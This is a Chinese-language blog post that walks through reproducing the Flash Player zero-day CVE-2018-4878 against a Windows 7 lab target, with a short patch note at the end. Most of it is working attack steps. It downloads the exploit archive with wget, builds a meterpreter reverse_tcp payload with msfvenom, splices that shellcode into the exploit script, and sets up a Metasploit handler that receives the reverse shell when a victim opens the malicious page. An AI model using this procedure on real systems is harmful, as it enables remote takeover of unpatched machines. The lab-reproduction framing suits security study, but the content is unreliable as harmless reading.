0x01 前言

Adobe公司在当地时间2018年2月1日发布了一条安全公告:

https://helpx.adobe.com/security/products/flash-player/apsa18-01.html

公告称一个新的Flash 0Day漏洞(CVE-2018-4878)已经存在野外利用,可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档、网页、垃圾电子邮件等。

0x02 漏洞影响

Flash Player当前最新版本28.0.0.137以及之前的所有版本

0x03 漏洞复现

环境测试:

攻击机:kali 

目标靶机:win7x64 +IE8.0+FLASH player28.0.0.137

1.下载cve-2018-4878的脚步利用

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

2.解压压缩文件后,可看到cve-2018-4878.py和exploit.swf

3. 我们需要对cve-2018-4878.py进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。附上原作者的exp地址:https://github.com/anbai-inc/CVE-2018-4878.git

4.其次需要修改替换原来弹计算器的shellcode

5.在kali下生成msf的shellcode:

msfvenom  -pwindows/meterpreter/reverse_tcplhost=your host  lport=your port  -fpython>shellcode.txt

6.将生成的shellcode替换掉原有cve-2018-4878.py中的shelldoce即可

7.在kal下执行cve-2018-4878.py,这里需要和index.html在一个目录下,即可生成恶意的exploit.swf

8.这里为了演示我将index.html和exploit.swf一同拷贝到目标靶机win7x64上,在ie浏览器下打开(也可以通过搭建web服务器的形式将index.html和exploit.swf放在web目录下,访问地址来打开)。

9.在msf 下进行监听设置

msf > use exploit/multi/handler

msf exploit(handler) > set payloadwindows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost  10.0.0.217

msf exploit(handler) > set lport  443

msf exploit(handler) > exploit

10.当打开目标恶意的index.html页面时,即可触发反弹shell

0x04 漏洞修复

建设通过官方网站升级到最新版本

https://get.adobe.com/cn/flashplayer/

Flash 0day CVE-2018-4878 漏洞复现相关推荐

  1. Google 0day远程命令执行漏洞复现

    目录 漏洞介绍 影响版本 漏洞复现 解决方案 漏洞介绍 国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面 ...

  2. Hacking Team Flash 0day漏洞学习笔记

    周日的夜晚,与囧桑下载下来Hacking Team之前爆出的flash 0day漏洞,怀着紧张激动的心情,在自己的机子上做了实验,经测试,在我的虚拟机(一个sp3的XP,貌似没装Flash)上根本跑不 ...

  3. 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)

    0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...

  4. 海康威视iVMS系统在野 0day漏洞复现

    漏洞概述 简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshe ...

  5. 海康威视iVMS综合安防系统任意文件上传漏洞复现 (0day)

    前言 此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 一.漏洞描述 海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations ...

  6. 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)

    文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...

  7. CVE(2017-15715、2021-41773、2021-40438)漏洞复现

    仅用于学习参考,不要贪玩哦(*^▽^*) 目录 CVE-2017-15715 漏洞介绍 漏洞复现 CVE-2021-41773 漏洞介绍 漏洞复现 CVE-2021-40438 漏洞介绍 漏洞复现 一 ...

  8. 大华智慧园区综合管理平台RCE漏洞复现(0day)

    0x01 产品简介 "大华智慧园区综合管理平台"是一款综合管理平台,具备园区运营.资源调配和智能服务等功能.平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务 ...

  9. 渗透测试之路:ThinkPHP漏洞复现

    1)简介 ThinkPHP是一个免费开源的,快速的,简单的面向对象的国产轻量级PHP开发框架. ThinkPHP遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业级应用开而诞生的,具有 ...

最新文章

  1. Spark弹性式数据集RDDs
  2. python(matplotlib5)——Contours 等高线图
  3. Linux 命令之 deluser -- 删除用户
  4. android 仿qq it蓝豹,《IT蓝豹》listview实现各种版面设计功能
  5. mysql 数据库授权(给某个用户授权某个数据库)
  6. LUN/PV/VG/LV
  7. vue main.js中引入js_手把手教你深入Vue3.0(Vue-cli4)项目打包性能优化实践
  8. 服务器需要哪些芯片,云计算的服务器需要芯片
  9. Linux下多进程服务端客户端模型二(粘包问题与一种解决方法)
  10. 召回离线评估指标(二)
  11. JAVA基础第四章-集合框架Collection篇
  12. static library libs/libvpx/libvpx.a is not portable!
  13. 20200106每日一句
  14. 卓有成效的管理者—第七章 有效的决定
  15. Genotype陨石的秘密
  16. 怎样快速将pdf在线转换成word免费版
  17. hive修改分区信息
  18. 【有料c++题目周刊 | 第四期】贝克街神探
  19. 在GT4 Client端EndpointReferenceType的标准序列化方法
  20. php-gtk2怎么用,PHP+GTK2 初体验,简单计算器客户端

热门文章

  1. 软件工程(QLGY2015)博客点评总结
  2. QT实现图片转pdf
  3. uniapp 点击动画_uni-app自定义加载动画组件
  4. 定义一个二维数组,写函数来实现对该二维数组求最大值。(要求,用行指针为函数形参)
  5. c语言编程雅可比解方程,求雅可比迭代法解方程组的C\C++程序,急需一个运用雅可比迭代法求线性方程组的C/C++程序!...
  6. matlab中normcdf函数用法,Matlab中标准正态分布的密度函数是normcdf(x,0,1)
  7. python通往天堂的选择_python获取电影天堂各版块电影
  8. Sysbench性能测试(一):sysbench简介与安装
  9. 读王立群《千古一帝秦始皇》有感
  10. jenkins:Build periodically和Poll SCM的区别